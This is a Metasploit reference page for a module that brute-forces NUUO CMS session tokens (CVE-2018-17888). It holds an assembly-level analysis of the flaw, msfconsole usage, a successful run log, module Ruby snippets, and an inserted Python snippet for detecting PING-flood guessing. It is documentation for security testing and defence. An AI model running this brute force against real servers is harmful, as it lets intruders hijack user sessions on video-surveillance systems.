Nuuo Central Management Server User Session Token Bruteforce - Metasploit
This page contains detailed information about how to use the auxiliary/gather/nuuo_cms_bruteforce Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Nuuo Central Management Server User Session Token Bruteforce
Module: auxiliary/gather/nuuo_cms_bruteforce
Source code: modules/auxiliary/gather/nuuo_cms_bruteforce.rb
Disclosure date: 2018-10-11
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): 5180
List of CVEs: CVE-2018-17888
Nuuo Central Management Server below version 2.4 has a flaw where it sends the heap address of the user object instead of a real session number when a user logs in. This can be used to reduce the keyspace for the session number from 10 million to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries. This module does exactly that - it uses a computed occurrence table to try the most common combinations, up to 1.2 million of them, in order to guess a valid user session. This session number can then be used to achieve code execution or download files - see the other Nuuo CMS auxiliary and exploit modules. Note that for this to work a user has to be logged into the system.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/nuuo_cms_bruteforce
msf auxiliary(nuuo_cms_bruteforce) > show targets
... a list of targets ...
msf auxiliary(nuuo_cms_bruteforce) > set TARGET target-id
msf auxiliary(nuuo_cms_bruteforce) > show options
... show and set options ...
msf auxiliary(nuuo_cms_bruteforce) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Nuuo CMS Session Bruteforce
The NUUO CMS protocol uses session tokens in a similar way to HTTP cookies. As mentioned in the summary, if a USERLOGIN request is sent with a correct username and password, a "User-Session-No" token will be returned. The number returned is composed of 8 digits, so if an attacker wanted to guess it, they would have 10 million possibilities, and would be able to bruteforce it on average after 5 million tries.
The function responsible for creating a new user is at offset 0x454E80 in CMS_Server.exe version 2.1. It sets up a new user object and returns the session token to the calling function. This function has what is probably a coding error - the number returned is actually not a number, but the heap address of the user object created by invoking "new()" in the user object class. An assembly snippet is shown below:
.text:00454E80 000 push 0FFFFFFFFh
.text:00454E82 004 push offset loc_5E2013
.text:00454E87 008 mov eax, large fs:0
.text:00454E8D 008 push eax
.text:00454E8E 00C sub esp, 8
.text:00454E91 014 push ebp
.text:00454E92 018 push esi
.text:00454E93 01C push edi
.text:00454E94 020 mov eax, dword_68D134
.text:00454E99 020 xor eax, esp
.text:00454E9B 020 push eax
.text:00454E9C 024 lea eax, [esp+24h+var_C]
.text:00454EA0 024 mov large fs:0, eax
.text:00454EA6 024 mov ebp, ecx
.text:00454EA8 024 lea edi, [ebp+43Ch]
.text:00454EAE 024 push edi ; lpCriticalSection_EnterCriticalSection
.text:00454EAF 028 mov [esp+28h+var_10], edi
.text:00454EB3 028 call ds:EnterCriticalSection
.text:00454EB9 024 push 1B8h ; unsigned int
.text:00454EBE 028 mov [esp+28h+var_4], 0
.text:00454EC6 028 call ??2@YAPAXI@Z ; new() operator, returns object in eax
(...)
After the call to ??2@YAPAXI@Z in .text:00454EC6, the session number is returned to the calling function (sub_457100), which then stores it and sends it back to the client as the valid session number:
NUCM/1.0 200 OK
User-Valid: %d
Server-Version: %s
Ini-Version: %d
License-Number: %d
User-Session-No: %u <---- session number, which is a hexadecimal memory address converted to decimal
These session numbers (tokens) are not that easy to predict; however, after collecting thousands of samples I was able to build a table of the most common occurrences, which reduces the possibilities from 10 million to about 1.2 million. In practice, the tokens can usually be guessed in less than 500,000 attempts - an improvement of 95% over standard bruteforcing. It is likely this can be further improved with some deeper analysis, but due to time constraints this was not investigated further. The tables used to do the bruteforcing are in Appendix #C.
This attack is perfectly feasible despite the high number of attempts needed. Firstly, there is no bruteforce protection on the CMS server, so we can just flood it with requests and find the session number in less than an hour. Secondly, due to the nature of this application, it is normal to have the software clients logged in for a long amount of time (days, weeks) in order to monitor the video cameras controlled by CMS.
It is worth noting that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess in a PING request until a 200 OK message is received.
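The PING-based probing described above leaves a distinctive trace on the server side: one client sending a flood of PING requests, each carrying a different User-Session-No, while a genuine client only ever re-PINGs the single session it was issued. The following Python is an added detection example and is not code from the Metasploit module or the advisory; the connection-log tuples, the sample response values and the 100-tokens-per-minute threshold are constructed assumptions, and only the NUCM header names come from the page.

```python
"""Added detection example for NUUO CMS session-token bruteforcing.
Not part of the Metasploit module; log format, sample values and the
threshold are constructed assumptions."""
import re
from collections import defaultdict


def parse_nucm_response(raw):
    """Parse a NUCM/1.0 response (status line followed by 'Header: value'
    lines, as shown in the advisory) into (status_code, headers)."""
    lines = raw.strip().splitlines()
    m = re.match(r"NUCM/1\.0 (\d{3})", lines[0])
    if not m:
        raise ValueError("not a NUCM/1.0 response")
    headers = {}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            headers[key.strip()] = value.strip()
    return int(m.group(1)), headers


# Constructed USERLOGIN response; only the header names come from the advisory.
SAMPLE_RESPONSE = (
    "NUCM/1.0 200 OK\r\nUser-Valid: 1\r\nServer-Version: 2.1.0\r\n"
    "Ini-Version: 1\r\nLicense-Number: 1\r\nUser-Session-No: 42094216\r\n"
)

# Constructed connection log: (epoch seconds, client IP, verb, User-Session-No).
# The legitimate client re-PINGs its single session every 10 s; the second
# client cycles through hundreds of different tokens within a few seconds.
SAMPLE_LOG = (
    [(1000 + i * 10, "10.0.0.5", "PING", 42094216) for i in range(6)]
    + [(1000 + i * 0.01, "10.0.0.9", "PING", 41000000 + i) for i in range(300)]
)


def find_session_bruteforce(log, window=60, threshold=100):
    """Return {client: distinct_tokens} for clients whose PING requests carry
    more than `threshold` distinct session numbers inside one `window`-second
    bucket. A real client only PINGs the session number it was issued."""
    seen = defaultdict(set)
    for ts, src, verb, session_no in log:
        if verb == "PING":
            seen[(src, int(ts // window))].add(session_no)
    flagged = {}
    for (src, _), tokens in seen.items():
        if len(tokens) > threshold:
            flagged[src] = max(flagged.get(src, 0), len(tokens))
    return flagged
```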
NUUO Central Management Server (CMS): all versions below 2.4.0
- 1.5.2 OK
- 2.1.0 OK
- 2.3.0 OK
Scenarios
Tested on Windows 10 Pro x64 running NCS Server v2.1.0
msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
[*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee!
[*] 172.22.222.200:5180 - Generating 2621440 session tokens
[+] 172.22.222.200:5180 - Found valid user session: 42094216
[*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_bruteforce) >
Msfconsole Usage
Here is how the gather/nuuo_cms_bruteforce auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/nuuo_cms_bruteforce
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show info
Name: Nuuo Central Management Server User Session Token Bruteforce
Module: auxiliary/gather/nuuo_cms_bruteforce
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2018-10-11
Provided by:
Pedro Ribeiro <[email protected]>
Check supported:
No
Basic options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
NCSPASS                      no        Password for NCSUSER
NCSSESSION                   no        Session number of logged in user
NCSUSER     admin            no        NUUO Central Management System username
RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT       5180             yes       The target port
Description:
Nuuo Central Management Server below version 2.4 has a flaw where it
sends the heap address of the user object instead of a real session
number when a user logs in. This can be used to reduce the keyspace
for the session number from 10 million to 1.2 million, and with a
bit of analysis it can be guessed in less than 500k tries. This
module does exactly that - it uses a computed occurence table to try
the most common combinations up to 1.2 million to try to guess a
valid user session. This session number can then be used to achieve
code execution or download files - see the other Nuuo CMS auxiliary
and exploit modules. Note that for this to work a user has to be
logged into the system.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-17888
https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
https://seclists.org/fulldisclosure/2019/Jan/51
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
Module Options
This is a complete list of options available in the gather/nuuo_cms_bruteforce auxiliary module:
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show options
Module options (auxiliary/gather/nuuo_cms_bruteforce):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
NCSPASS                      no        Password for NCSUSER
NCSSESSION                   no        Session number of logged in user
NCSUSER     admin            no        NUUO Central Management System username
RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT       5180             yes       The target port
Advanced Options
Here is a complete list of advanced options supported by the gather/nuuo_cms_bruteforce auxiliary module:
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show advanced
Module advanced options (auxiliary/gather/nuuo_cms_bruteforce):
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
NCSBRUTEAPI  false            no        Bruteforce Version header used during login
NCSTRACE     false            no        Show NCS requests and responses
NCSVERSION                    no        Version header used during login
VERBOSE      false            no        Enable detailed status messages
WORKSPACE                     no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/nuuo_cms_bruteforce module can do:
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the gather/nuuo_cms_bruteforce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed to bruteforce, trying with the less likely numbers as a last resort...
Here is a relevant code snippet related to the "Failed to bruteforce, trying with the less likely numbers as a last resort..." error message:
print_status('Bruteforcing session - this might take a while, go get some coffee!')
session = nil
time = Benchmark.realtime {
  session = session_bruteforce_list(WEIGHTED_ARRAY_7)
  unless session
    print_error('Failed to bruteforce, trying with the less likely numbers as a last resort...')
    session = session_bruteforce_list(WEIGHTED_ARRAY_6)
  end
}
unless session
  fail_with(Failure::Unknown, 'Failed to bruteforce user session.')
Failed to bruteforce user session.
Here is a relevant code snippet related to the "Failed to bruteforce user session." error message:
    print_error('Failed to bruteforce, trying with the less likely numbers as a last resort...')
    session = session_bruteforce_list(WEIGHTED_ARRAY_6)
  end
}
unless session
  fail_with(Failure::Unknown, 'Failed to bruteforce user session.')
else
  print_good("Found valid user session: #{session}")
  print_status("Time taken: #{time} seconds; total tries #{@counter}")
end
end
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11765 Merged Pull Request: Update NUUO mixin, move code to Rex
- #11291 Merged Pull Request: Add Nuuo CMS session bruteforcing module
References
- CVE-2018-17888
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
- https://seclists.org/fulldisclosure/2019/Jan/51
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/nuuo_nvrmini_reset
- auxiliary/gather/nuuo_cms_file_download
- exploit/linux/http/nuuo_nvrmini_auth_rce
- exploit/linux/http/nuuo_nvrmini_unauth_rce
- exploit/multi/http/nuuo_nvrmini_upgrade_rce
- exploit/windows/nuuo/nuuo_cms_fu
- exploit/windows/nuuo/nuuo_cms_sqli
- auxiliary/gather/citrix_published_bruteforce
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/typo3_bruteforce
- auxiliary/scanner/http/caidao_bruteforce_login
- auxiliary/scanner/http/joomla_bruteforce_login
- post/multi/gather/dns_bruteforce
- auxiliary/admin/sunrpc/solaris_kcms_readfile
- auxiliary/scanner/http/ektron_cms400net
- auxiliary/scanner/http/vcms_login
Authors
- Pedro Ribeiro <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.